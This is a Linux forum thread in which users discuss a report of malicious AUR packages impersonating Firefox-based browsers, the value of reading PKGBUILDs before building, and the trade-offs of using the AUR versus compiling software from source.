This story (https://www.theregister.com/2025/07/22/arch_aur_browsers_compromised/) suggests arch AUR firefox derivatives might be compromised.
Read carefully. It wasn't the Firefox packages. It was packages mimicking them.
https://lists.archlinux.org/archives/list/
[email protected]/thread/7EZTJXLIAQLARQNTMEW2HBWZYE626IFJ/
Already solved.
Yep, I've seen this story making the rounds. It's honestly probably not a big deal.
If anyone installed one of these obviously sketchy packages, you should not have an AUR helper installed on your system. It's for your own good.
Brodie Robertson on YouTube speculated that it already got installed a few times because they had some votes. I tend to believe that those numbers were artificially inflated by dummy accounts. Then the perp thought it wise to get a bunch of Redditors' eyes on it, which resulted it their prompt removal from the AUR.
Let this be a reminder to read and understand PKGBUILDs before building and installing them.
These words can't be any truer. If possible, just avoid the AUR.
I still have not found a reason to install from the AUR (ymmv of course)
really.... I have. In fact, I get vital software I can not live without from the AUR, not the least of which is WIndow Maker, the Windows Manager of choice for me, and linphone, and open-numismat, google-earth, several software development tools...
Yeah - I just don't see a reason to use the AUR (for me).
If there is an app I really, really need, I'll just grab the source and compile myself. There was a time tho, a few years back when I wanted to move from Eagle CAD to KiCad. Back then, only really, really new KiCad had the import feature. That was about as complex as I got.
Of course, now that the import feature is standard... Oh wait, there is possibly one. Chirp - but here again, I could just go to the source.
If you just review a simple PKGBUILD the same thing results.
Not all PKGBUILD's are simple though..
I have some customized packages eg gvim which I prefer to use compiled against gtk2 rather than gtk3. It's fairly easy to download the pkg repo from artix or arch and then make small changes to the PKGBUILD.
I think using makepkg with a modified official PKGBUILD is probably less risky and at least preserves the pacman database.
Compiling from source will scatter files about and possibly lead to confusion; as example I just found
$ packer -Qo /lib/pyston3.8
error: No package owns /lib/pyston3.8
I vaguely remember pyston, but 3.8 was a long time ago :(
On a Debian based system with no AUR, building from source was quite common, the thing to do was define the install directory to be under /usr/local during the build configuration, you shouldn't touch the main system dirs to avoid problems. It can be done without the AUR but it still won't stop the risk of installing infected software if it's in the source itself, which can happen too. Using the AUR actually adds another layer of oversight and could be seen as making things safer in some ways than picking up random code online, despite the additional risk of a compromised PKGBUILD, there are advantages and drawbacks to both approaches I think. You could stick to only using official code and not forks, but you can make that same choice in the AUR as well.